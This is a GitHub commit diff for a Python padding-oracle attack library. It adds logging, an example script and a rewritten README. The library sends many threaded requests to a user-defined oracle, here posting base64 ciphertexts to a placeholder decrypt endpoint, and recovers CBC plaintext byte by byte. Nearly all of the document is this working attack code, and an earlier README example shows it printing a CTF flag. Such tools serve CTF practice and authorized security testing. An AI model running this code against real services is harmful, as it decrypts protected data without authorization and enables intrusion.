Skip to content

Commit 3f24805

Browse files
committed
Add logging and example
1 parent 039812d commit 3f24805

File tree

3 files changed

+163
-116
lines changed

3 files changed

+163
-116
lines changed

README.md

Lines changed: 13 additions & 18 deletions
Original file line numberDiff line numberDiff line change
@@ -20,27 +20,22 @@ All you need is defining the **oracle function** to check whether the given ciph
2020
```python
2121
#!/usr/bin/env python3
2222

23-
import time, requests
24-
from padding_oracle import * # also provide url encoding and base64 functions
23+
import requests, logging
24+
from padding_oracle import *
2525

26+
url = 'http://some-website.com/decrypt'
2627
sess = requests.Session()
2728

28-
cipher = b'[______IV______][____Cipher____]' # decrypted plain text will be 16 bytes
29+
def oracle(cipher):
30+
r = sess.post(url, data={'cipher': base64_encode(cipher)})
31+
assert 'SUCCESS' in r.text or 'FAILED' in r.text
32+
return 'SUCCESS' in r.text
33+
34+
cipher = b'[______IV______][___Block_1____][___Block_2____]'
2935
block_size = 16
36+
num_threads = 64
37+
38+
plaintext = padding_oracle(cipher, block_size, oracle, num_threads, log_level=logging.DEBUG)
3039

31-
@padding_oracle(cipher, block_size, num_threads=64)
32-
def oracle(cipher): # return True if the cipher can be correctly decrypted
33-
while True:
34-
try:
35-
text = sess.get('https://example.com/decrypt',
36-
params={'cipher': base64_encode(cipher)}).text
37-
assert 'YES' in text or 'NO' in text # check if the request failed
38-
break
39-
except:
40-
print('[!] request failed')
41-
time.sleep(1)
42-
continue
43-
return 'YES' in text
44-
45-
print(oracle) # b'FLAG{XXXXXXXX}\x02\x02'
40+
print(remove_padding(plaintext).decode())
4641
```

example.py

Lines changed: 19 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,19 @@
1+
import requests
2+
from padding_oracle import *
3+
4+
url = 'http://some-website.com/decrypt'
5+
sess = requests.Session()
6+
7+
def oracle(cipher):
8+
r = sess.post(url, data={'cipher': base64_encode(cipher)})
9+
assert 'SUCCESS' in r.text or 'FAILED' in r.text
10+
return 'SUCCESS' in r.text
11+
12+
num_threads = 64
13+
14+
cipher = b'[______IV______][___Block_1____][___Block_2____]'
15+
block_size = 16
16+
17+
plaintext = padding_oracle(cipher, block_size, oracle, num_threads)
18+
19+
print(remove_padding(plaintext).decode())

padding_oracle.py

Lines changed: 131 additions & 98 deletions
Original file line numberDiff line numberDiff line change
@@ -1,111 +1,144 @@
1-
import threading
2-
import types, typing
3-
import urllib.parse, base64
1+
import logging
2+
import base64
3+
import urllib.parse
44

5+
from typing import Union
56
from concurrent.futures import ThreadPoolExecutor
67

78

8-
def base64_decode(s):
9-
return base64.b64decode(s.encode())
9+
__all__ = [
10+
'base64_encode', 'base64_decode',
11+
'urlencode', 'urldecode',
12+
'padding_oracle',
13+
'remove_padding'
14+
]
1015

11-
def base64_encode(b):
12-
return base64.b64encode(b).decode()
1316

14-
def urlencode(b):
15-
return urllib.parse.quote(b)
17+
def _to_bytes(data: Union[str, bytes]):
18+
if isinstance(data, str):
19+
data = data.encode()
20+
assert isinstance(data, bytes)
21+
return data
1622

17-
def urldecode(b):
18-
return urllib.parse.unquote_plus(b)
23+
def _to_str(data):
24+
if isinstance(data, bytes):
25+
data = data.decode()
26+
elif isinstance(data, str):
27+
pass
28+
else:
29+
data = str(data)
30+
return data
1931

2032

21-
def padding_oracle(cipher, block_size, oracle_threads=1, verbose=True):
22-
def _execute(oracle):
23-
24-
assert oracle is not None, \
25-
'the oracle function is not implemented'
26-
assert callable(oracle), \
27-
'the oracle function should be callable'
28-
assert oracle.__code__.co_argcount == 1, \
29-
'expect oracle function with only 1 argument'
30-
assert len(cipher) % block_size == 0, \
31-
'cipher length should be multiple of block size'
32-
33-
lock = threading.Lock()
34-
oracle_executor = ThreadPoolExecutor(max_workers=oracle_threads)
35-
plaintext = [b' '] * (len(cipher) - block_size)
36-
37-
def _update_plaintext(i: int, c: bytes):
38-
lock.acquire()
39-
plaintext[i] = c
40-
if verbose:
41-
print('[decrypted]', b''.join(plaintext))
42-
lock.release()
43-
44-
def _block_decrypt_task(i, prev_block: bytes, block: bytes):
45-
# if verbose:
46-
# print('block[{}]: {}'.format(i, block))
33+
def base64_decode(data: Union[str, bytes]) -> bytes:
34+
data = _to_bytes(data)
35+
return base64.b64decode(data)
36+
37+
def base64_encode(data: Union[str, bytes]) -> str:
38+
data = _to_bytes(data)
39+
return base64.b64encode(data).decode()
40+
41+
def urlencode(data: Union[str, bytes]) -> str:
42+
data = _to_bytes(data)
43+
return urllib.parse.quote(data)
44+
45+
def urldecode(data: str) -> bytes:
46+
data = _to_str(data)
47+
return urllib.parse.unquote_plus(data)
48+
49+
def remove_padding(data: Union[str, bytes]):
50+
data = _to_bytes(data)
51+
return data[:-data[-1]]
52+
4753

48-
guess_list = list(prev_block)
54+
55+
56+
def _dummy_oracle(cipher):
57+
raise NotImplementedError('You must implement the oracle function')
58+
59+
60+
def padding_oracle(cipher,
61+
block_size,
62+
oracle=_dummy_oracle,
63+
num_threads=1,
64+
log_level=logging.INFO,
65+
null=b' '):
66+
# Check the oracle function
67+
assert callable(oracle), 'the oracle function should be callable'
68+
assert oracle.__code__.co_argcount == 1, 'expect oracle function with only 1 argument'
69+
assert len(cipher) % block_size == 0, 'cipher length should be multiple of block size'
70+
71+
logger = logging.getLogger('padding_oracle')
72+
logger.setLevel(log_level)
73+
formatter = logging.Formatter('[%(asctime)s][%(levelname)s] %(message)s')
74+
# formatter = logging.Formatter('[%(asctime)s][%(name)s][%(levelname)s] %(message)s')
75+
handler = logging.StreamHandler()
76+
handler.setFormatter(formatter)
77+
logger.addHandler(handler)
78+
79+
# The plaintext bytes list to save the decrypted data
80+
plaintext = [null] * (len(cipher) - block_size)
81+
82+
def _update_plaintext(i: int, c: bytes):
83+
plaintext[i] = c
84+
logger.info('plaintext: {}'.format(b''.join(plaintext)))
85+
86+
oracle_executor = ThreadPoolExecutor(max_workers=num_threads)
87+
88+
def _block_decrypt_task(i, prev: bytes, block: bytes):
89+
logger.debug('task={} prev={} block={}'.format(i, prev, block))
90+
guess_list = list(prev)
91+
92+
for j in range(1, block_size + 1):
93+
oracle_hits = []
94+
oracle_futures = {}
4995

50-
for j in range(1, block_size + 1):
51-
oracle_hits = []
52-
oracle_futures = {}
96+
for k in range(256):
97+
if i == len(blocks) - 1 and j == 1 and k == prev[-j]:
98+
# skip the last padding byte if it is identical to the original cipher
99+
continue
53100

54-
for k in range(256):
55-
# ensure the last padding byte is changed (or it will)
56-
if i == len(blocks) - 1 and j == 1 and k == prev_block[-j]:
57-
continue
58-
59-
test_list = guess_list.copy()
60-
test_list[-j] = k
61-
oracle_futures[k] = oracle_executor.submit(
62-
oracle, bytes(test_list) + block)
63-
64-
# if verbose:
65-
# print('+', end='', flush=True)
66-
67-
for k, future in oracle_futures.items():
68-
if future.result():
69-
oracle_hits.append(k)
70-
if verbose:
71-
print('=> hits(block={}, pos=-{}):'.format(i, j), oracle_hits)
72-
73-
if len(oracle_hits) != 1:
74-
if verbose:
75-
print('[!] number of hits is not 1. (skipping this block)')
76-
return
77-
78-
guess_list[-j] = oracle_hits[0]
79-
80-
p = guess_list[-j] ^ j ^ prev_block[-j]
81-
_update_plaintext(i * block_size - j, bytes([p]))
101+
test_list = guess_list.copy()
102+
test_list[-j] = k
103+
oracle_futures[k] = oracle_executor.submit(oracle, bytes(test_list) + block)
104+
105+
for k, future in oracle_futures.items():
106+
if future.result():
107+
oracle_hits.append(k)
108+
109+
logger.debug('oracles at block[{}][{}] -> {}'.format(i, block_size - j, oracle_hits))
82110

83-
for n in range(j):
84-
guess_list[-n-1] ^= j
85-
guess_list[-n-1] ^= j + 1
86-
87-
blocks = []
88-
89-
for i in range(0, len(cipher), block_size):
90-
j = i + block_size
91-
blocks.append(cipher[i:j])
92-
93-
if verbose:
94-
print('blocks: {}'.format(blocks))
95-
96-
with ThreadPoolExecutor() as executor:
97-
futures = []
98-
for i in reversed(range(1, len(blocks))):
99-
prev_block = b''.join(blocks[:i])
100-
block = b''.join(blocks[i:i+1])
101-
futures.append(
102-
executor.submit(
103-
_block_decrypt_task, i, prev_block, block))
104-
for future in futures:
105-
future.result()
106-
107-
oracle_executor.shutdown()
108-
109-
return b''.join(plaintext)
110-
111-
return _execute
111+
if len(oracle_hits) != 1:
112+
logfmt = 'at block[{}][{}]: expect only one positive result, got {}. (skipped)'
113+
logger.error(logfmt.format(i, block_size-j, len(oracle_hits)))
114+
return
115+
116+
guess_list[-j] = oracle_hits[0]
117+
118+
p = guess_list[-j] ^ j ^ prev[-j]
119+
_update_plaintext(i * block_size - j, bytes([p]))
120+
121+
for n in range(j):
122+
guess_list[-n-1] ^= j
123+
guess_list[-n-1] ^= j + 1
124+
125+
blocks = []
126+
127+
for i in range(0, len(cipher), block_size):
128+
j = i + block_size
129+
blocks.append(cipher[i:j])
130+
131+
logger.debug('blocks: {}'.format(blocks))
132+
133+
with ThreadPoolExecutor() as executor:
134+
futures = []
135+
for i in reversed(range(1, len(blocks))):
136+
prev = b''.join(blocks[:i])
137+
block = b''.join(blocks[i:i+1])
138+
futures.append(executor.submit(_block_decrypt_task, i, prev, block))
139+
for future in futures:
140+
future.result()
141+
142+
oracle_executor.shutdown()
143+
144+
return b''.join(plaintext)

0 commit comments

Comments
 (0)